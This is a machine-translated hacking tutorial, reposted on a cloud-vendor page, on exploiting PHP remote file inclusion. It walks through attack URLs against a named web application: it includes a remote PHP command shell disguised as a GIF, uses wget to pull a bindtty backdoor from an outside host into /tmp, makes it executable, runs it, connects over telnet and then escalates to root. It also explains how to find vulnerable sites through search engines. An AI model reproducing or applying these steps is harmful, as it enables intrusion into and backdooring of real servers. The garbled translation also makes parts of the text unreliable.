Exploitation of Remote File Inclusion Vulnerability

Source: Internet
Author: User

Exploitation of Remote File Inclusion Vulnerability

 

****************************
* Author: cracklove *
* Ema! L: cracklove # ZJ. com *
* Homepage: N/A, maybe down *
****************************
1) What is the Remote File Inclusion Vulnerability?
Let's take a look at the following code,
<?
<! --- Codz --->

Include ($ page );

<! --- Codz --->
?>

Because the $ page variable lacks adequate filtering, we can determine whether the $ page is local or on a remote server. Therefore, we can specify the Remote Server File as the parameter and submit it to the $ page variable,
Execute remote files with Web permissions.

2) Preliminary Application of Vulnerabilities
Suppose the index. php code of a website is as follows:
<?
<! --- Codz --->

Include ($ page );

<! --- Codz --->
?>
We can submit:
Http://siteurl.tld/index.php? Page = http: // remote server/file name
Suppose?
Taoqi.tao raised zookeeper arez. php. The content is
<?
<! --- Codz --->

System ("ls/tmp /");

<! --- Codz --->
?>
In this way, we can download warez. php to a local directory and execute it! To put it bluntly, the file under TMP is displayed.

3) Practical drills
I 've talked a lot about it, and now I have started to exercise my practical skills.
(1) preparations:
① Websites with Remote File Inclusion Vulnerabilities
② Phpshell
③ Backdoor

For example, you can go to www.cnns.net or www.securiteam.com to pay attention to recent vulnerabilities. We will certainly have the latest artmedic kleinanzeigen vulnerability.
Artmedic kleinanzeigen: The Remote File Inclusion vulnerability is caused by the lack of filtering of the $ site variable in index. php. Therefore, you can submit the following URL:
Http: // artmedic kleinanzeigen URL/path/index. php? Site = http: // phpshellurl
So how can we find the site that uses artmedic kleinanzeigen? Here is a tip, by the way.
I went to the official station of artmedic kleinanzeigen and found the demonstration of the artmedic kleinanzeigen program. I just clicked a connection,
Connect to http://siteurl.com/index.php? Site = anzeigenmaerktestart, so?
Search index. php? Site = anzeigenmaerktestart,
Those!
Use ARTM
The site of edic kleinanzeigen is almost out. We can try it one by one!

For ②, I recommend data cha0s php Command/safemode exploit 4.1, or angel's saphpshell and phpspy, which have good functions.

For ③, you can use the BIND program bound to the port, and then Telnet according to the port bound by the program. You can use the digit-Labs connect-back backdoor that San previously used,
However, I often use bindtty and bindtty to bind to port 7474.

(2) Start Exploitation
Submit http://xxx.de/index.php? Site = http://phphot.com/cse.gif? Cmd = ID
Description Example: cse.gif is the data cha0s php Command/safemode exploit 4.1 mentioned above, cmd = ID is the permission to query the current user.
Generally, uid = 99 (nobody) gid = 99 (nobody) groups = 99 (nobody). uid is not 0, so it is not a root account.
If the command can be executed, it indicates that the system function is not forbidden. Then we can execute the command boldly!

② Submit http://xxx.de/index.php? Site = http://phphot.com/cse.gif? Command = wget http://phphot.com/bindtty-O/tmp/bindtty
In this way, we can download bindtty to the tmp directory. Why do you need to go to the tmp directory? Because the tmp directory is generally writable.

③ If the file has been downloaded, you must set the properties. Otherwise, the system will prompt that you do not have the permission.
HTTP :!
// Xxx.de/index.php? Site = http://phphot.com/cse.gif? Cmd = chmod 775/tmp/bindtty
In this way, we have the permission to execute the bindtty file!

④ Run bindtty
Http://xxx.de/index.php? Site = http://phphot.com/cse.gif? Cmd =/tmp/bindtty
If it succeeds, it will display daemon is starting... OK, pid = XXXX.
As we have already mentioned above that bindtty is bound to port 7474, now we can telnet host 7474.
PS: it is not recommended to use a Windows Command Prompt for telnet, which may cause confusion. Putty is recommended.

Upgrade to root.here you have finished your work. You can search for the corresponding exploit for the information displayed in the cse.gif file to raise the permission.

This is almost the end. If you have any questions, please submit them.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.